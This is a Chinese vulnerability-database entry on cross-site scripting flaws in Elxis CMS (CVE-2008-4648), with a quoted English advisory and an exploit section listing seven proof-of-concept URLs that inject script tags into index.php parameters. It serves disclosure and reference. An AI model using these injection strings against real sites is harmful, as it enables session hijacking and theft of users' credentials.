Elxis CMS 'index.php' 多个跨站脚本攻击

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116404 漏洞类型 跨站脚本
发布时间 2008-10-14 更新时间 2008-10-22
CVE编号 CVE-2008-4648 CNNVD-ID CNNVD-200810-349
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32487
https://cxsecurity.com/issue/WLB-2012030016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-349
|漏洞详情
ElxisCMS中的index.php存在跨站脚本攻击漏洞,远程攻击者可以借助PATH_INFO或option,Itemid,id,task,bid和contact_id参数,注入任意的web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/31764/info

Elxis CMS is prone to multiple cross-site scripting and session-fixation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The application is also prone to a session-fixation vulnerability.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Using the session-fixation issue, the attacker can hijack the session and gain unauthorized access to the affected application.

Elxis CMS 2006.1 is vulnerable; other versions may also be affected.

http://www.example.net/index.php?>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>
|参考资料

来源:XF
名称:elxis-index-xss(45866)
链接:http://xforce.iss.net/xforce/xfdb/45866
来源:BID
名称:31764
链接:http://www.securityfocus.com/bid/31764
来源:SECUNIA
名称:32278
链接:http://secunia.com/advisories/32278
来源:MISC
链接:http://packetstormsecurity.org/0810-exploits/elxis-xss.txt